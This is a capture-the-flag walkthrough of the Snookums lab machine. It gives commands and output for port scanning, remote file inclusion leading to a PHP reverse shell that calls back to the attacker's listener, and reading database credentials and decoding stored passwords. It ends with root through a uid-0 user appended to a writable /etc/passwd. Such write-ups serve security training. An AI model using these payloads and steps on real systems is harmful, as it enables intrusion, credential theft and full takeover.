Snookums

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-04 06:43 +03
Nmap scan report for 192.168.115.58                                                                                                                       07:04:50 [41/188]
Host is up, received echo-reply ttl 61 (0.17s latency).                              
Scanned at 2025-10-04 06:43:25 +03 for 242s                                          
Not shown: 65527 filtered tcp ports (no-response)                                    
PORT      STATE SERVICE     REASON         VERSION                                                                                                                         
21/tcp    open  ftp         syn-ack ttl 61 vsftpd 3.0.2                                                                                                                    
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                               
|_Can't get directory listing: TIMEOUT                                               
| ftp-syst:                                                                                                                                                                
|   STAT:                                                                            
| FTP server status:                                                                 
|      Connected to ::ffff:192.168.45.235                                            
|      Logged in as ftp                                                                                                                                                    
|      TYPE: ASCII                                                                                                                                                         
|      No session bandwidth limit                                                                                                                                          
|      Session timeout in seconds is 300                                                                                                                                   
|      Control connection is plain text                                                                                                                                    
|      Data connections will be plain text                                                                                                                                 
|      At session startup, client count was 3                                        
|      vsFTPd 3.0.2 - secure, fast, stable                                           
|_End of status                                                                                                                                                            
22/tcp    open  ssh         syn-ack ttl 61 OpenSSH 7.4 (protocol 2.0)                                                                                                      
| ssh-hostkey:                                                                       
|   2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)                       
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtUk/m8ssh+nfn52VkolWbpJihGyH2vdELXJv/X0HIj5hbkXnM1QgSSKltTq+cev1QtkrwtUTV3j2AD5Ftxz7ivrm0PvsGNI6QGnIxdAwCvt1OjDHoz6IGDS4kz5IcW3Q3S
mwceCwDKPA55mupKhKlKjkZyLn4+d9An50AV1Hyj+E8APALHQBQFVp7cdJe9lqj7K8dxNVo1XExUDgU3trRSGDO5bZN7C57VsHXN6MIITU9RtyMhLbxYwA6KTU8RluW1/5v7T4EnHlRZcdmbneVcefK+EK69Mgdn5L+ww/5YrWi
YbXDOUTEymWfeyoOl2LoFBD/nmSb9hayKirR4guf                                                                                                                                   
|   256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)                      
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOk5HGeIHhlXkWc9v507Ap0zc5wnKxhGa7WG9fWJhL/yr9bveHEBZllHErnP6vaWM4WRudCxA6z6rqnhep9wNW8=
|   256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)                                                                                                          
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDvde70kt/TjqXRmChJ0XvKYTpljMNu6TKlAtF/S4IHL   
80/tcp    open  http        syn-ack ttl 61 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)  
|_http-title: Simple PHP Photo Gallery                                               
| http-methods:                                                                                                                                                            
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                               
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16                                                                                                                     
111/tcp   open  rpcbind     syn-ack ttl 61 2-4 (RPC #100000)                                                                                                               
|_vulners: ERROR: Script execution failed (use -d to debug)                                                                                                                
| rpcinfo:                                                                                                                                                                 
|   program version    port/proto  service                                                                                                                                 
|   100000  2,3,4        111/tcp   rpcbind                                           
|   100000  2,3,4        111/udp   rpcbind                                                                                                                                 
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind 
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp  open  mysql       syn-ack ttl 61 MySQL (unauthorized)
33060/tcp open  mysqlx      syn-ack ttl 61 MySQL X protocol listener
Service Info: Host: SNOOKUMS; OS: Unix

FTP (21):

Anonymous login is present, but I could not do anything or find any useful thing.

HTTP (80):

Run directory fuzzing:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ gobuster dir -u http://192.168.115.58 -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.115.58
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 206]
/.htaccess.php        (Status: 403) [Size: 215]
/.htaccess            (Status: 403) [Size: 211]
/.hta.php             (Status: 403) [Size: 210]
/.htpasswd            (Status: 403) [Size: 211]
/.htpasswd.php        (Status: 403) [Size: 215]
/cgi-bin/             (Status: 403) [Size: 210]
/css                  (Status: 301) [Size: 234] [--> http://192.168.115.58/css/]
/db.php               (Status: 200) [Size: 0]
/functions.php        (Status: 200) [Size: 0]
/image.php            (Status: 200) [Size: 1508]                                     
/images               (Status: 301) [Size: 237] [--> http://192.168.115.58/images/]
/index.php            (Status: 200) [Size: 2730]
/index.php            (Status: 200) [Size: 2730]
/js                   (Status: 301) [Size: 233] [--> http://192.168.115.58/js/]
/photos               (Status: 301) [Size: 237] [--> http://192.168.115.58/photos/]
Progress: 9226 / 9226 (100.00%)
===============================================================
Finished
===============================================================

Lets explore the website:

Simple php photo gallery running on port 80, and it exposes its current version 0.8, we can search for any public exploits:

SimplePHPGal 0.7 - Remote File InclusionExploit Database

We can test if this vulnerability still exists or get fixed:

This exploit states that the application was vulnerable to LFI and if allow_url_fopen was enabled to RFI as well.

Also the vulnable endpoint is /image.php?img=.

We can test this out:

The vulnearbility still exists.

Try RFI:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Go back to our web server:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.115.58 - - [04/Oct/2025 07:18:23] code 404, message File not found
192.168.115.58 - - [04/Oct/2025 07:18:23] "GET /test.php HTTP/1.0" 404 -

It tried to load to get test.php but did not find it.

Exploitation:

Shell as apache:

We can now pull php reverse shell from the webshells, and change the IP, and the port to get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ cat shell.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.235';  // CHANGE THIS
$port = 80;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;                                                                     
$error_a = null;                                                                     
$shell = 'uname -a; w; id; /bin/sh -i';                                              
$daemon = 0;                                                                         
$debug = 0;
<snipped>

We have to put our port to something the target machine can reach out to, because sometimes if firewall is running it will block all ports except configured ones in services like http or mysql, etc.

As shown in the nmap scan that port 3306 is open, we will start our webserver to listen on that port and host our php reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 3306
Serving HTTP on 0.0.0.0 port 3306 (http://0.0.0.0:3306/) ...

And start our listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ nc -nlvp 80
listening on [any] 80 ...

Now try with shell.php instead of test.php:

We can see it will hang, because we got a shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 3306
Serving HTTP on 0.0.0.0 port 3306 (http://0.0.0.0:3306/) ...
192.168.115.58 - - [04/Oct/2025 07:27:46] "GET /shell.php HTTP/1.0" 200 -

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.235] from (UNKNOWN) [192.168.115.58] 49114
Linux snookums 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:27:47 up  1:15,  0 users,  load average: 0.04, 0.04, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$

Stabilize our shell:

sh-4.2$ which python
/usr/bin/python
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ export TERM=xterm
bash-4.2$ ^Z
zsh: suspended  nc -nlvp 80

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ stty raw -echo ; fg                  
[1]  + continued  nc -nlvp 80

bash-4.2$ stty rows 43 columns 171

Now we have full interactive shell.

When we read the /etc/passwd file, we will find michael presents there, but ls the home folder:

bash-4.2$ cat /etc/passwd                                                                                                                                    
root:x:0:0:root:/root:/bin/bash                                                                                                                                            
bin:x:1:1:bin:/bin:/sbin/nologin                                                                                                                                           
daemon:x:2:2:daemon:/sbin:/sbin/nologin                                                                                                                                    
adm:x:3:4:adm:/var/adm:/sbin/nologin                                                                                                                                       
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin                                                                                                                                   
sync:x:5:0:sync:/sbin:/bin/sync                                                                                                                                            
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown                                                                                                                               
halt:x:7:0:halt:/sbin:/sbin/halt                                                                                                                                           
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin                                                                                                                             
operator:x:11:0:operator:/root:/sbin/nologin                                                                                                                               
games:x:12:100:games:/usr/games:/sbin/nologin                                                                                                                              
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin                                                                                                                                
nobody:x:99:99:Nobody:/:/sbin/nologin                                                                                                                                      
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin                                                                                                       
dbus:x:81:81:System message bus:/:/sbin/nologin                                                                                                                            
polkitd:x:999:998:User for polkitd:/:/sbin/nologin                                                                                                                         
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin                                                                                                         
postfix:x:89:89::/var/spool/postfix:/sbin/nologin                                                                                                                          
chrony:x:998:996::/var/lib/chrony:/sbin/nologin                                                                                                                            
michael:x:1000:1000:Michael:/home/michael:/bin/bash                                                                                                                        
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin                                                                                                                       
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false                                                                                                                       
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin                                                                        
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
bash-4.2$ ls -la
total 0
drwxr-xr-x.  3 root    root     21 Jun  9  2020 .
dr-xr-xr-x. 17 root    root    224 Jun  9  2020 ..
drwx------.  2 michael michael 100 Jul  9  2020 michael

Lateral Movement to michael:

As we have seen in the gobuster that we have db.php, lets read it to maybe find any credentials, so we can resuse the password, or access the mysql database:

bash-4.2$ cat /var/www/html/db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>

Try it with mysql:

bash-4.2$ mysql -h localhost -u root -pMalapropDoffUtilize133707:30:50 [2568/2862]
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 8.0.20 MySQL Community Server - GPL

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

We successfully authenticated to mysql as root with that password.

Lets do some enumeration:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| SimplePHPGal       |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

We will find SimplePHPGal which is not a default database:

mysql> use SimplePHPGal 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.00 sec)

mysql> desc users;
+----------+--------------+------+-----+---------+-------+
| Field    | Type         | Null | Key | Default | Extra |
+----------+--------------+------+-----+---------+-------+
| username | varchar(20)  | YES  |     | NULL    |       |
| password | varchar(100) | YES  |     | NULL    |       |
+----------+--------------+------+-----+---------+-------+
2 rows in set (0.00 sec)

We have users tables that contains two columns.

mysql> select * from users;
+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)

The passwords seemes to be base64 encoded, lets decode them, and try them one by one:

bash-4.2$ echo 'U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==' | base64 -d | base64 -d
HockSydneyCertify123

Lets try this password for michael:

bash-4.2$ su michael
Password: HockSydneyCertify123
[michael@snookums html]$

We are michael.

Privilege Escalation:

I will upload linpeas to perform a quick automated scan for us:

[michael@snookums shm]$ curl http://192.168.45.235/linpeas.sh -o linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  933k  100  933k    0     0   111k      0  0:00:08  0:00:08 --:--:--  147k
[michael@snookums shm]$ chmod +x linpeas.sh 
[michael@snookums shm]$ ls
linpeas.sh

Run it:

[michael@snookums shm]$ ./linpeas.sh

<snipped>

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. NO

We can make sure that this is the case:

[michael@snookums shm]$ ls -la /etc/passwd
-rw-r--r--. 1 michael root 1226 Oct  4 00:43 /etc/passwd

We will find the passwd file is writable, which could help us by adding a new user as root.

First we need to generate a hashes password using openssl or any other tool:

[michael@snookums shm]$ openssl passwd -1 -salt YouGotHacked password123
$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr

Echo this hash to the end of the passwd file with the Caesar3 user:

[michael@snookums shm]$ echo 'Caesar3:$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr:0:0:test:/root:/bin/bash' >> /etc/passwd

We assigned the user id and group id to 0 which is the same as root.

Check if our command worked:

[michael@snookums shm]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
<snipped>                                                                 
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
Caesar3:$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr:0:0:test:/root:/bin/bash

We will see that our newly created user at the bottom of the file.

Now swithc user to Caesar3:

[michael@snookums shm]$ su Caesar3
Password: password123
[root@snookums shm]# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:httpd_t:s0

We successfully rooted the box.

Read the flags:

[root@snookums shm]# cat /root/proof.txt 
3f684b0bd97f2e1b88aa03326d413184
[root@snookums shm]# cat /home/michael/local.txt 
abf19481ec7d4a219639adca6a3f933b